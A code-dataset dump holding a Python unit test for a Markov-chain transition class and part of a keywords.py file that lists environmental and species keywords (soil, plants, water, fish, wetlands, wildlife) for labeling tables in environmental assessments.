hexsha
string | size
int64 | ext
string | lang
string | max_stars_repo_path
string | max_stars_repo_name
string | max_stars_repo_head_hexsha
string | max_stars_repo_licenses
list | max_stars_count
int64 | max_stars_repo_stars_event_min_datetime
string | max_stars_repo_stars_event_max_datetime
string | max_issues_repo_path
string | max_issues_repo_name
string | max_issues_repo_head_hexsha
string | max_issues_repo_licenses
list | max_issues_count
int64 | max_issues_repo_issues_event_min_datetime
string | max_issues_repo_issues_event_max_datetime
string | max_forks_repo_path
string | max_forks_repo_name
string | max_forks_repo_head_hexsha
string | max_forks_repo_licenses
list | max_forks_count
int64 | max_forks_repo_forks_event_min_datetime
string | max_forks_repo_forks_event_max_datetime
string | content
string | avg_line_length
float64 | max_line_length
int64 | alphanum_fraction
float64 | qsc_code_num_words_quality_signal
int64 | qsc_code_num_chars_quality_signal
float64 | qsc_code_mean_word_length_quality_signal
float64 | qsc_code_frac_words_unique_quality_signal
float64 | qsc_code_frac_chars_top_2grams_quality_signal
float64 | qsc_code_frac_chars_top_3grams_quality_signal
float64 | qsc_code_frac_chars_top_4grams_quality_signal
float64 | qsc_code_frac_chars_dupe_5grams_quality_signal
float64 | qsc_code_frac_chars_dupe_6grams_quality_signal
float64 | qsc_code_frac_chars_dupe_7grams_quality_signal
float64 | qsc_code_frac_chars_dupe_8grams_quality_signal
float64 | qsc_code_frac_chars_dupe_9grams_quality_signal
float64 | qsc_code_frac_chars_dupe_10grams_quality_signal
float64 | qsc_code_frac_chars_replacement_symbols_quality_signal
float64 | qsc_code_frac_chars_digital_quality_signal
float64 | qsc_code_frac_chars_whitespace_quality_signal
float64 | qsc_code_size_file_byte_quality_signal
float64 | qsc_code_num_lines_quality_signal
float64 | qsc_code_num_chars_line_max_quality_signal
float64 | qsc_code_num_chars_line_mean_quality_signal
float64 | qsc_code_frac_chars_alphabet_quality_signal
float64 | qsc_code_frac_chars_comments_quality_signal
float64 | qsc_code_cate_xml_start_quality_signal
float64 | qsc_code_frac_lines_dupe_lines_quality_signal
float64 | qsc_code_cate_autogen_quality_signal
float64 | qsc_code_frac_lines_long_string_quality_signal
float64 | qsc_code_frac_chars_string_length_quality_signal
float64 | qsc_code_frac_chars_long_word_length_quality_signal
float64 | qsc_code_frac_lines_string_concat_quality_signal
float64 | qsc_code_cate_encoded_data_quality_signal
float64 | qsc_code_frac_chars_hex_words_quality_signal
float64 | qsc_code_frac_lines_prompt_comments_quality_signal
float64 | qsc_code_frac_lines_assert_quality_signal
float64 | qsc_codepython_cate_ast_quality_signal
float64 | qsc_codepython_frac_lines_func_ratio_quality_signal
float64 | qsc_codepython_cate_var_zero_quality_signal
bool | qsc_codepython_frac_lines_pass_quality_signal
float64 | qsc_codepython_frac_lines_import_quality_signal
float64 | qsc_codepython_frac_lines_simplefunc_quality_signal
float64 | qsc_codepython_score_lines_no_logic_quality_signal
float64 | qsc_codepython_frac_lines_print_quality_signal
float64 | qsc_code_num_words
int64 | qsc_code_num_chars
int64 | qsc_code_mean_word_length
int64 | qsc_code_frac_words_unique
null | qsc_code_frac_chars_top_2grams
int64 | qsc_code_frac_chars_top_3grams
int64 | qsc_code_frac_chars_top_4grams
int64 | qsc_code_frac_chars_dupe_5grams
int64 | qsc_code_frac_chars_dupe_6grams
int64 | qsc_code_frac_chars_dupe_7grams
int64 | qsc_code_frac_chars_dupe_8grams
int64 | qsc_code_frac_chars_dupe_9grams
int64 | qsc_code_frac_chars_dupe_10grams
int64 | qsc_code_frac_chars_replacement_symbols
int64 | qsc_code_frac_chars_digital
int64 | qsc_code_frac_chars_whitespace
int64 | qsc_code_size_file_byte
int64 | qsc_code_num_lines
int64 | qsc_code_num_chars_line_max
int64 | qsc_code_num_chars_line_mean
int64 | qsc_code_frac_chars_alphabet
int64 | qsc_code_frac_chars_comments
int64 | qsc_code_cate_xml_start
int64 | qsc_code_frac_lines_dupe_lines
int64 | qsc_code_cate_autogen
int64 | qsc_code_frac_lines_long_string
int64 | qsc_code_frac_chars_string_length
int64 | qsc_code_frac_chars_long_word_length
int64 | qsc_code_frac_lines_string_concat
null | qsc_code_cate_encoded_data
int64 | qsc_code_frac_chars_hex_words
int64 | qsc_code_frac_lines_prompt_comments
int64 | qsc_code_frac_lines_assert
int64 | qsc_codepython_cate_ast
int64 | qsc_codepython_frac_lines_func_ratio
int64 | qsc_codepython_cate_var_zero
int64 | qsc_codepython_frac_lines_pass
int64 | qsc_codepython_frac_lines_import
int64 | qsc_codepython_frac_lines_simplefunc
int64 | qsc_codepython_score_lines_no_logic
int64 | qsc_codepython_frac_lines_print
int64 | effective
string | hits
int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
1bf46aaa6ab9e14cc4a7054440dee43e7bc7fa71
| 1,728
|
py
|
Python
|
tests/api_tests.py
|
ownaginatious/markhov-chain
|
dc62afb142a6fa62261c5f3f0714feb211d71c70
|
[
"MIT"
] | null | null | null |
tests/api_tests.py
|
ownaginatious/markhov-chain
|
dc62afb142a6fa62261c5f3f0714feb211d71c70
|
[
"MIT"
] | null | null | null |
tests/api_tests.py
|
ownaginatious/markhov-chain
|
dc62afb142a6fa62261c5f3f0714feb211d71c70
|
[
"MIT"
] | null | null | null |
from chai import Chai
from markhov_chain import MarkhovChain
class ApiTests(Chai):
def setUp(self):
super(ApiTests, self).setUp()
self.mc = MarkhovChain()
def test_add_transition(self):
self.mc.add_transition("A", "B")
self.mc.add_transition("A", "B")
self.mc.add_transition("A", "B")
self.mc.add_transition("B", "A")
self.mc.add_transition("B", "C")
self.mc.add_transition("C", "A")
expected = {
'A': { 'B': 3},
'B': { 'A': 1, 'C': 1 },
'C': { 'A': 1 }
}
assertEqual(self.mc._transition_dump(), expected)
def test_remove_transition_singles(self):
self.mc.add_transition("A", "B")
self.mc.add_transition("A", "B")
self.mc.add_transition("A", "B")
self.mc.add_transition("B", "A")
self.mc.add_transition("B", "C")
self.mc.add_transition("C", "A")
self.mc.remove_transition("A", "B")
self.mc.remove_transition("B", "A")
self.mc.remove_transition("B", "A")
self.mc.remove_transition("C", "A")
expected = {
'A': { 'B': 2 },
'B': { 'C': 1 }
}
assertEqual(self.mc._transition_dump(), expected)
def test_remove_transition_all(self):
self.mc.add_transition("A", "B")
self.mc.add_transition("A", "B")
self.mc.add_transition("A", "B")
self.mc.add_transition("B", "A")
self.mc.add_transition("B", "C")
self.mc.add_transition("B", "C")
self.mc.add_transition("B", "C")
self.mc.add_transition("C", "A")
self.mc.remove_transition("A", "B", all=True)
self.mc.remove_transition("B", "A", all=True)
self.mc.remove_transition("B", "A", all=True)
self.mc.remove_transition("B", "C", all=True)
self.mc.remove_transition("B", "C", all=True)
expected = {
'C': { 'A': 1 }
}
assertEqual(self.mc._transition_dump(), expected)
| 21.873418
| 51
| 0.627894
| 264
| 1,728
| 3.943182
| 0.109848
| 0.190202
| 0.172911
| 0.365034
| 0.838617
| 0.838617
| 0.817483
| 0.817483
| 0.817483
| 0.775216
| 0
| 0.004775
| 0.15162
| 1,728
| 78
| 52
| 22.153846
| 0.705321
| 0
| 0
| 0.641509
| 0
| 0
| 0.041112
| 0
| 0
| 0
| 0
| 0
| 0.056604
| 1
| 0.075472
| false
| 0
| 0.037736
| 0
| 0.132075
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
40391d15f07324eaadf5dcb52472979eb58426df
| 90,245
|
py
|
Python
|
berdi/Section_05_VEC_Labeling_for_Tables/keywords.py
|
iVibudh/CER-ESA-Phase2
|
297c07ac5e8f9af484c70ce4c6620b3741621cdd
|
[
"MIT"
] | null | null | null |
berdi/Section_05_VEC_Labeling_for_Tables/keywords.py
|
iVibudh/CER-ESA-Phase2
|
297c07ac5e8f9af484c70ce4c6620b3741621cdd
|
[
"MIT"
] | null | null | null |
berdi/Section_05_VEC_Labeling_for_Tables/keywords.py
|
iVibudh/CER-ESA-Phase2
|
297c07ac5e8f9af484c70ce4c6620b3741621cdd
|
[
"MIT"
] | null | null | null |
import pickle
import nltk
from nltk.corpus import stopwords
from nltk.stem.porter import *
from nltk.tokenize import word_tokenize
Landscape_terrain_and_weather = """Physical and Meteorological Environment
Physical Environment
Meteorological Environment
Precipitation
Snowfall
Wind
rain
Mean temperatures
Slope
Geotechnical
Slumping
Subsidence
Weather
Erosion
Ice
Permafrost
Climate trend
climate
water erosion
wind erosion
acid-generating rock
temperature
physical
meteorological
landslides
mudflows
slumping
subsidence
seismicity
flooding
migrating watercourses
eroding banks
extreme weather events
peak flow regime
ice jams
acid rock
climate variability
ground conditions
thaw
till
earthquake
avalanche
sloping
topography
elevation
terrain
landscape
weather
physiography
bedrock
geology
natural hazard"""
Soil = """Soil Productivity
Soil
Agriculture
Topsoil
Subsoil
Soil horizon
Drainage
Erosion
soil contamination
CCME
Canadian Council of Ministers of the Environment
Soil compaction
Soil structure
Soil classification
Soil handling
Containment
reclamation
thickness of horizon
tilth
grubbing
soil quality
salinity
sediments
rocks
minerals
sand
chernozem
DVG
Dunvargan
calcareous
CRW
sand
sandy
Glaciofluvial
boulders
gravel
silt
clay
stone
stoniness"""
Plants = """Vegetation
Plant
planting
Rare plant
Boreal
Grassland
Prairie
Forest
forested
Clearing
plant community
orchid
orchard
Weeds
Invasive species
invasive plants
Seed mix
Herbicide
Tree
leaf
branch
Growth
Old growth
Biodiversity
forestry
clubroot
wood
spruce
fir
birch
pine
aspen
tamarack
willow
beech
maple
black walnut
hickory
oak
redcedar
hemlock
Douglas-fir
genus
agricultural
root
seed
mulcher
mulch
bentgrass
sedge
carex
wood
moss
bulrush
oatgrass
mannagrass
flower
androgynum
Aulacomnium
undulatum
Atrichum
wheatgrass
parviflora
luzula
crawfordii
Achnatherum
needlegrass
eleocharis
reedgrass
calamagrostis
latifolia
Elymus
grain
wildrye
meadow
speargrass
shrub
chokecherry
Gattinger\'s Agalinis
Agalinis gattingeri
Rough Agalinis
Agalinis aspera
Skinner\'s Agalinis
Agalinis skinneriana
Scarlet Ammannia
Ammannia robusta
Short-rayed Alkali Aster
Symphyotrichum frondosum
Eastern Mountain Avens
Geum peckii
Deltoid Balsamroot
Balsamorhiza deltoidea
Tall Beakrush
Rhynchospora macrostachya
Cherry Birch
Betula lenta
Bluehearts
Buchnera americana
Fernald\'s Braya
Braya fernaldii
Hairy Braya
Braya pilosa
Long\'s Braya
Braya longii
Tall Bugbane
Actaea elata
Bashful Bulrush
Trichophorum planifolium
Slender Bush-clover
Lespedeza virginica
California Buttercup
Ranunculus californicus
Water-plantain Buttercup
Ranunculus alismifolius
Butternut
Juglans cinerea
Eastern Prickly Pear Cactus
Opuntia humifusa
Spalding\'s Campion
Silene spaldingii
Coastal Scouler\'s Catchfly
Silene scouleri grandis
Muhlenberg\'s Centaury
Centaurium muehlenbergii
American Chestnut
Castanea dentata
Colicroot
Aletris farinosa
Slender Collomia
Collomia tenella
American Columbo
Frasera caroliniensis
Pink Coreopsis
Coreopsis rosea
Eastern Flowering Dogwood
Cornus florida
Contorted-pod Evening-primrose
Camissonia contorta
Southern Maidenhair Fern
Adiantum capillus-veneris
Eastern Prairie Fringed-orchid
Platanthera leucophaea
Western Prairie Fringed-orchid
Platanthera praeclara
Plymouth Gentian
Sabatia kennedyana
White Prairie Gentian
Gentiana alba
American Ginseng
Panax quinquefolius
Virginia Goat\'s-rue
Tephrosia virginiana
Showy Goldenrod
Solidago speciosa
Rayless Goldfields
Lasthenia glaberrima
Forked Three-awned Grass
Aristida basiramea
Fascicled Ironweed
Vernonia fasciculata
Tweedy\'s Lewisia
Lewisiopsis tweedyi
Small-flowered Lipocarpha
Lipocarpha micrantha
Seaside Birds-foot Lotus
Lotus formosissimus
Furbish\'s Lousewort
Pedicularis furbishiae
Dense-flowered Lupine
Lupinus densiflorus
Prairie Lupine
Lupinus lepidus
Streambank Lupine
Lupinus rivularis
Virginia Mallow
Sida hermaphrodita
White Meconella
Meconella oregana
Coast Microseris
Microseris bigelovii
Pink Milkwort
Polygala incarnata
Hoary Mountain-mint
Pycnanthemum incanum
Red Mulberry
Morus rubra
Phantom Orchid
Cephalanthera austiniae
Bearded Owl-clover
Triphysaria versicolor
Grand Coulee Owl-clover
Orthocarpus barbatus
Rosy Owl-clover
Orthocarpus bracteosus
Victoria\'s Owl-clover
Castilleja victoriae
Golden Paintbrush
Castilleja levisecta
Branched Phacelia
Phacelia ramosissima
Whitebark Pine
Pinus albicaulis
Heart-leaved Plantain
Plantago cordata
Large Whorled Pogonia
Isotria verticillata
Nodding Pogonia
Triphora trianthophora
Small Whorled Pogonia
Isotria medeoloides
Ogden\'s Pondweed
Potamogeton ogdenii
Fragrant Popcornflower
Plagiobothrys figuratus
Stoloniferous Pussytoes
Antennaria flagellaris
Engelmann\'s Quillwort
Isoetes engelmannii
Quebec Rockcress
Boechera quebecensis
Kellogg\'s Rush
Juncus kelloggii
Pink Sand-verbena
Abronia umbellata
Small-flowered Sand-verbena
Tripterocalyx micranthus
Dwarf Sandwort
Minuartia pusilla
False Hop Sedge
Carex lupuliformis
Foothill Sedge
Carex tumulicola
Juniper Sedge
Carex juniperorum
Lindley\'s False Silverpuffs
Uropappus lindleyi
Brook Spike-primrose
Epilobium torreyi
Dense Spike-primrose
Epilobium densiflorum
Bent Spike-rush
Eleocharis geniculata
Bent Spike-rush
Eleocharis geniculata
Horsetail Spike-rush
Eleocharis equisetoides
Thread-leaved Sundew
Drosera filiformis
Small-flowered Tonella
Tonella tenella
Toothcup
Rotala ramosior
Cucumber Tree
Magnolia acuminata
Bog Bird\'s-foot Trefoil
Lotus pinnatus
Drooping Trillium
Trillium flexipes
Howell\'s Triteleia
Triteleia howellii
Bird\'s-foot Violet
Viola pedata
Yellow Montane Violet praemorsa
praemorsa
Viola praemorsa ssp. praemorsa
Barrens Willow
Salix jejuna
Spotted Wintergreen
Chimaphila maculata
Wood-poppy
Stylophorum diphyllum
Tall Woolly-heads
Psilocarphus elatior
Dwarf Woolly-heads
Psilocarphus brevissimus
Batwing Vinyl Lichen
Leptogium platynum
Boreal Felt Lichen
Erioderma pedicellatum
Pale-bellied Frost Lichen
Physconia subpallida
Seaside Centipede Lichen
Heterodermia sitchensis
Vole Ears Lichen
Rusty Cord-moss
Entosthodon rubiginosus
Acuteleaf Small Limestone Moss
Seligeria acutifolia
Margined Streamside Moss
Scouleria marginata
Nugget Moss
Microbryum vlassovii
Poor Pocket Moss
Fissidens pauperculus
Rigid Apple Moss
Bartramia stricta
Roell\'s Brotherella Moss
Brotherella roellii
Silver Hair Moss
Fabronia pusilla
Griscom’s Arnica
Arnica griscomii ssp. griscomii
Anticosti Aster
Symphyotrichum anticostense
Gulf of St. Lawrence Aster
Symphyotrichum laurentianum
Western Silvery Aster
Symphyotrichum sericeum
White Wood Aster
Eurybia divaricata
Willowleaf Aster
Symphyotrichum praealtum
Eastern Baccharis
Baccharis halimifolia
Branched Bartonia
Bartonia paniculata ssp. paniculata
Dense Blazing Star
Liatris spicata
Kentucky Coffee-tree
Gymnocladus dioicus
Tiny Cryptantha
Cryptantha minima
Lakeside Daisy
Hymenoxys herbacea
Deerberry
Vaccinium stamineum
Gray\'s Desert-parsley
Lomatium grayi
Lemmon\'s Holly Fern
Polystichum lemmonii
Mountain Holly Fern
Polystichum scopulinum
Victorin\'s Gentian
Gentianopsis virgata ssp. victorinii
Showy Goldenrod
Solidago speciosa
Goldenseal
Hydrastis canadensis
Smooth Goosefoot
Chenopodium subglabrum
Round-leaved Greenbrier
Smilax rotundifolia
Dwarf Hackberry
Celtis tenuifolia
Wild Hyacinth
Camassia scilloides
Van Brunt\'s Jacob’s-ladder
Polemonium vanbruntiae
Small White Lady\'s-slipper
Cypripedium candidum
Hare-footed Locoweed
Oxytropis lagopus
Macoun\'s Meadowfoam
Limnanthes macounii
Mexican Mosquito-fern
Azolla mexicana
Slender Mouse-ear-cress
Halimolobos virgata
Cliff Paintbrush
Castilleja rupicola
Sweet Pepperbush
Clethra alnifolia
Showy Phlox
Phlox speciosa ssp. occidentalis
Slender Popcornflower
Plagiobothrys tenellus
Bolander\'s Quillwort
Isoetes bolanderi
False Rue-anemone
Enemion biternatum
Bear\'s-foot Sanicle
Sanicula arctopoides
Purple Sanicle
Sanicula bipinnatifida
Soapweed
Yucca glauca
Western Spiderwort
Tradescantia occidentalis
Hill\'s Thistle
Cirsium hillii
Toothcup
Rotala ramosior
Purple Twayblade
Liparis liliifolia
American Water-willow
Justicia americana
Green-scaled Willow
Salix chlorolepis
Blunt-lobed Woodsia
Woodsia obtusa
Seaside Bone
Hypogymnia heterophylla
Black-foam Lichen
Anzia colpodes
Crumpled Tarpaper Lichen
Collema coniophilum
Wrinkled Shingle Lichen
Pannaria lurida
Eastern Waterfan
Peltigera hydrothyria
Porsild\'s Bryum
Mielichhoferia macrocarpa
Alkaline Wing-nerved Moss
Pterygoneurum kozlovii
Haller\'s Apple Moss
Bartramia halleriana
Spoon-leaved Moss
Bryoandersonia illecebra
Blue Ash
Fraxinus quadrangulata
Crooked-stem Aster
Symphyotrichum prenanthoides
Nahanni Aster
Symphyotrichum nahanniense
White-top Aster
Sericocarpus rigidus
Vancouver Island Beggarticks
Bidens amplissima
Western Blue Flag
Iris missouriensis
Buffalograss
Bouteloua dactyloides
American Hart\'s-tongue Fern
Asplenium scolopendrium
Coastal Wood Fern
Dryopteris arguta
Goldencrest
Lophiola aurea
Houghton\'s Goldenrod
Solidago houghtonii
Riddell\'s Goldenrod
Solidago riddellii
Mackenzie Hairgrass
Deschampsia mackenzieana
Common Hoptree
Ptelea trifoliata
Tuberous Indian-plantain
Arnoglossum plantagineum
Dwarf Lake Iris
Iris lacustris
Eastern Lilaeopsis
Lilaeopsis chinensis
Lyall\'s Mariposa Lily
Calochortus lyallii
Fernald\'s Milk-vetch
Astragalus robbinsii var. fernaldii
Water Pennywort
Hydrocotyle umbellata
Beach Pinweed
Lechea maritima
Yukon Podistera
Podistera yukonensis
Hill\'s Pondweed
Potamogeton hillii
Hairy Prairie-clover
Dalea villosa
Prototype Quillwort
Isoetes prototypus
Redroot
Lachnanthes caroliniana
Climbing Prairie Rose
Rosa setigera
Swamp Rose-mallow
Hibiscus moscheutos
New Jersey Rush
Juncus caesariensis
Spiked Saxifrage
Micranthes spicata
Baikal Sedge
Carex sabulosa
Tubercled Spike-rush
Eleocharis tuberculosa
Floccose Tansy
Tanacetum huronense var. floccosum
Pitcher\'s Thistle
Cirsium pitcheri
Athabasca Thrift
Armeria maritima interior
Victorin\'s Water-hemlock
Cicuta maculata var. victorinii
Yukon Wild Buckwheat
Eriogonum flavum var. aquilinum
Felt-leaf Willow
Salix silicicola
Sand-dune Short-capsuled Willow
Salix brachycarpa var. psammophila
Turnor\'s Willow
Salix turnorii
Dwarf Woolly-heads
Psilocarphus brevissimus
Large-headed Woolly Yarrow
Achillea millefolium var. megacephalum
Banded Mosses
Cord-moss
Entosthodon fascicularis
Columbian Carpet Moss
Bryoerythrophyllum columbianum
Twisted Oak Moss
Syntrichia laevipila
Tiny Tassel
Crossidium seriatum
Frosted Lichens
Glass-whiskers
Sclerophora peronella
Flooded Jellyskin
Leptogium rivulare
Blue Felt Lichen
Degelia plumbea
Boreal Felt Lichen
Erioderma pedicallatum
Cryptic Paw Lichen
Nephroma occultum
Oldgrowth Specklebelly Lichen
Pseudocyphellaria rainierensis
Peacock Vinyl Lichen
Leptogium polycarpum
Mountain Crab-eye
Acroscyphus sphaerophoroides
Western Waterfan
Peltigera gowardii"""
Water = """Water Quality and Quantity
Water
waterbody
water body
watercourse
evaporation
transpiration
Surface water
Ground water
Runoff
Contamination
contaminant
Water use
Hydrologic
hydrological
hydro
hydrostatic
salinity
blasting
Withdrawal
Flow
Peak
Basin
Inter-basin
Water Quality
Water quality testing
Water table
Containment
Sediment
sewer
waste
wastewater
biosolids
sludge
septage
groundwater
groundwater-related
aquifers
streamflow
aquatics
acquatics
river
hydrometric
watershed
waterfall
sea
ocean
lake
pond
fjords
wadis
runs
reservoir
lagoon
bay
harbor
well
well-water
surface-water
surfacewater
hot spring
creek
tidal
subtidal
mercury
water contamination"""
Fish = """Fish
Fish Habitat
fish-bearing
fisheries
Fisheries and Oceans Canada
mercury
water contamination
deleterious
DFO
Fisheries and Oceans
Local fisheries
Trout
Fisheries Act
Offsetting
Instream work
in-stream work
Restricted activity period
Fish-bearing water body
Riparian
acquatic
Aquatic
Aquatic invasive species
Spawning
Fry
fingerling
alevin
chlorine
chlorinated
Sport fishery
Spawning deterrent
spawning period
Stream
River
In-stream
instream
Wetted width
substrate
salmon
oncorhynchus
walleye
pike
crappie
redhorse
pumpkinseed fish
bowfin
bass
catfish
sunfish
bluegill
spotted gar
muskellunge
ruffe
yellow perch
shiner
sucker
whitefish
cisco
sea
ocean
lake
pond
bay
subtidal
Striped Bass
Morone saxatilis
Silver Chub
Macrhybopsis storeriana
Lake Chubsucker
Erimyzon sucetta
Shortnose Cisco
Coregonus reighardi
Spring Cisco
Coregonus sp.
Nooksack Dace
Rhinichthys cataractae ssp.
Redside Dace
Clinostomus elongatus
Speckled Dace
Rhinichthys osculus
Channel Darter
Percina copelandi
Channel Darter
Percina copelandi
Spotted Gar
Lepisosteus oculatus
Western Brook Lamprey
Lampetra richardsoni
Northern Madtom
Noturus stigmosus
Copper Redhorse
Moxostoma hubbsi
Atlantic Salmon
Salmo salar
Basking Shark
Cetorhinus maximus
White Shark
Carcharodon carcharias
Carmine Shiner
Notropis percobromus
Rainbow Smelt
Osmerus mordax
Rainbow Smelt
Osmerus mordax
Enos Lake Benthic Threespine Stickleback
Gasterosteus aculeatus
Enos Lake Limnetic Threespine Stickleback
Misty Lake Lentic Threespine Stickleback
Misty Lake Lotic Threespine Stickleback
Vananda Creek Benthic Threespine Stickleback
Vananda Creek Limnetic Threespine Stickleback
Gasterosteus aculeatus
White Sturgeon
Acipenser transmontanus
Rainbow Trout
Oncorhynchus mykiss
Atlantic Whitefish
Coregonus huntsmani
Eastern Sand Darter
Ammocrypta pellucida
Eastern Sand Darter
Ammocrypta pellucida
Vancouver Lamprey
Entosphenus macrostomus
Plains Minnow
Hybognathus placitus
Pugnose Minnow
Opsopoeodus emiliae
Western Silvery Minnow
Hybognathus argyritis
Black Redhorse
Moxostoma duquesnei
Coastrange Sculpin
Cottus aleuticus
Rocky Mountain Sculpin
Cottus sp.
Pugnose Shiner
Notropis anogenus
Silver Shiner
Notropis photogenis
Spotted Wolffish
Anarhichas minor
Mountain Sucker
Catostomus platyrhynchus
Salish Sucker
Catostomus sp. cf. catostomus
Bull Trout
Salvelinus confluentus
Westslope Cutthroat Trout
Oncorhynchus clarkii lewisi
Northern Wolffish
Anarhichas denticulatus
Bigmouth Buffalo
Ictiobus cyprinellus
Channel Darter
Percina copelandi
Dolly Varden
Salvelinus malma malma
Banded Killifish
Fundulus diaphanus
Upper Great Lakes Kiyi
Coregonus kiyi kiyi
Northern Brook Lamprey
Ichthyomyzon fossor
Silver Lamprey
Ichthyomyzon unicuspis
Cutlip Minnow
Exoglossum maxillingua
Grass Pickerel
Esox americanus vermiculatus
River Redhorse
Moxostoma carinatum
Rougheye Rockfish type I
Sebastes sp. type I
Rougheye Rockfish type II
Sebastes sp. type II
Yelloweye Rockfish
Sebastes ruberrimus
Columbia Sculpin
Cottus hubbsi
Deepwater Sculpin
Myoxocephalus thompsonii
Rocky Mountain Sculpin
Cottus sp.
Shorthead Sculpin
Cottus confusus
Bluntnose Sixgill Shark
Hexanchus griseus
Bridle Shiner
Notropis bifrenatus
Giant Threespine Stickleback
Gasterosteus aculeatus
Unarmoured Threespine Stickleback
Gasterosteus aculeatus
Green Sturgeon
Acipenser medirostris
Lake Sturgeon
Acipenser fulvescens
Shortnose Sturgeon
Acipenser brevirostrum
Mountain Sucker
Catostomus platyrhynchus
Spotted Sucker
Minytrema melanops
Northern Sunfish
Lepomis peltastes
Longspine Thornyhead
Sebastolobus altivelis
Tope
Galeorhinus galeus
Blackstripe Topminnow
Fundulus notatus
Bull Trout
Salvelinus confluentus
Westslope Cutthroat Trout
Oncorhynchus clarkii lewisi
Warmouth
Lepomis gulosus
Atlantic Wolffish
Anarhichas lupus"""
Wetlands = """Wetlands
Class (wetland class)
wetland
Bog
Fen
Marsh
Swamp
Shallow water
Wetland function
Hydrological function
Drainage area
Canadian wetland classification system
Federal policy on wetland conservation
Wetland monitoring
water recharge
potholes
ponds
peatbogs
mires
mangrove forest
carr
pocosin
floodplains
vernal pool
baygall
slough"""
Wildlife = """Wildlife and Wildlife Habitat
wildlife
wildlife habitat
nocturnal
bat trees
hibernation
migratory birds
migratory bird sanctuary
MBCA
migratory birds convention act
Nesting
foraging
Restricted activity period
Mammal
Ungulate
Amphibian
Reptile
Breeding
eggs
Den
migration
staging
movement corridors
forest interior
denning
Wintering
overwintering
national park
national wildlife reserve
national wildlife area
world biosphere reserve
Hibernaculum
hibernacula
Riparian habitat
Old growth habitat
Sensitive period
Sensory disturbance
Mortality
Mortality risk
Habitat alteration
Habitat loss
Habitat destruction
Range
Population
Distribution
Sanctuary
sanctuaries
Important Bird Area
Bat
caribou
bird
goose
swans
frogs
toads
salamanders
newts
caecilians
furbearing
reptile
invertebrate
rattlesnake
snake
waterbird
bear
moose
bat
owl
beaver
moose
polar bear
bison
puffin
lynx
deer
wolf
reindeer
bear
cougar
goose
coyote
wolverine
raccoon
elk
crane
porcupine
fox
hare
loon
marmot
rabbit
bobcat
owl
rattlesnake
insect
bug
weasel
otter
skunk
mollusk
mollusc
reptile
amphibian
mineral lick
minerallick
hunting
trapping
American Badger jacksoni
jaksoni
Badger
Taxidea taxus jacksoni
American Badger jeffersonii
Taxidea taxus jeffersonii
American Badger jeffersonii
jeffersonii
Taxidea taxus jeffersonii
Tri-coloured Bat
Perimyotis subflavus
Peary Caribou
Caribou
Rangifer tarandus pearyi
Woodland Caribou
Rangifer tarandus caribou
Ord\'s Kangaroo Rat
Dipodomys ordii
Vancouver Island Marmot
Marmota vancouverensis
Townsend\'s Mole
Scapanus townsendii
Western Harvest Mouse dychei
dychei
Reithrodontomys megalotis dychei
Little Brown Myotis
Myotis
Myotis lucifugus
Northern Myotis
Myotis septentrionalis
Northern Bobwhite
Colinus virginianus
Yellow-breasted Chat auricollis
auricollis
Icteria virens auricollis
Yellow-breasted Chat virens
virens
Icteria virens virens
Whooping Crane
Grus americana
Eskimo Curlew
Numenius borealis
Acadian Flycatcher
Empidonax virescens
Horned Grebe
Podiceps auritus
Ivory Gull
Pagophila eburnea
Red Knot rufa
rufa
Calidris canutus rufa
Streaked Horned Lark
Eremophila alpestris strigata
Barn Owl
Tyto alba
Burrowing Owl
Athene cunicularia
Spotted Owl caurina
caurina
Strix occidentalis caurina
Mountain Plover
Charadrius montanus
Piping Plover circumcinctus
circuinctus
Charadrius melodus circumcinctus
Piping Plover melodus
melodus
Charadrius melodus melodus
King Rail
Rallus elegans
Greater Sage-Grouse urophasianus subspecies
Centrocercus urophasianus urophasianus
Williamson\'s Sapsucker
Sphyrapicus thyroideus
Pink-footed Shearwater
Ardenna creatopus
Loggerhead Shrike migrans
migrans
Lanius ludovicianus migrans
Coastal Vesper Sparrow
Pooecetes gramineus affinis
Henslow\'s Sparrow
Ammodramus henslowii
Black Swift
Cypseloides niger
Roseate Tern
Sterna dougallii
Sage Thrasher
Oreoscoptes montanus
Cerulean Warbler
Setophaga cerulea
Kirtland\'s Warbler
Dendroica kirtlandii
Prothonotary Warbler
Protonotaria citrea
Red-headed Woodpecker
Melanerpes erythrocephalus
White-headed Woodpecker
Picoides albolarvatus
Cricket Frog
Acris blanchardi
Northern Leopard Frog
Lithobates pipiens
Oregon Spotted Frog
Rana pretiosa
Allegheny Mountain Dusky Salamander
Desmognathus ochrophaeus
Allegheny Mountain Dusky Salamander
Desmognathus ochrophaeus
Eastern Tiger Salamander
Ambystoma tigrinum
Jefferson Salamander
Ambystoma jeffersonianum
Northern Dusky Salamander
Desmognathus fuscus
Small-mouthed Salamander
Ambystoma texanum
Western Tiger Salamander
Ambystoma mavortium
Fowler\'s Toad
Anaxyrus fowleri
Eastern Reptiles
Foxsnake
Pantherophis gloydi
Eastern Foxsnake
Pantherophis gloydi
Butler\'s Gartersnake
Thamnophis butleri
Greater Short-horned Lizard
Phrynosoma hernandesi
Massasauga
Sistrurus catenatus
Desert Nightsnake
Hypsiglena chlorophaea
Queensnake
Regina septemvittata
Blue Racer
Coluber constrictor foxii
Gray Ratsnake
Pantherophis spiloides
Leatherback Sea Turtle
Dermochelys coriacea
Leatherback Sea Turtle
Dermochelys coriacea
Loggerhead Sea Turtle
Caretta caretta
Five-lined Skink
Plestiodon fasciatus
Sharp-tailed Snake
Contia tenuis
Spiny Softshell
Apalone spinifera
Blanding\'s Turtle
Emydoidea blandingii
Spotted Turtle
Clemmys guttata
Western Painted Turtle
Chrysemys picta bellii
Broad-banded Forestsnail
Allogona profunda
Oregon Forestsnail
Allogona townsendiana
Proud Globelet
Patera pennsylvanica
Hotwater Physa
Physella wrighti
Island Blue
Plebejus saepiolus insulanus
Aweme Borer
Papaipema aweme
Hoptree Borer
Prays atomocella
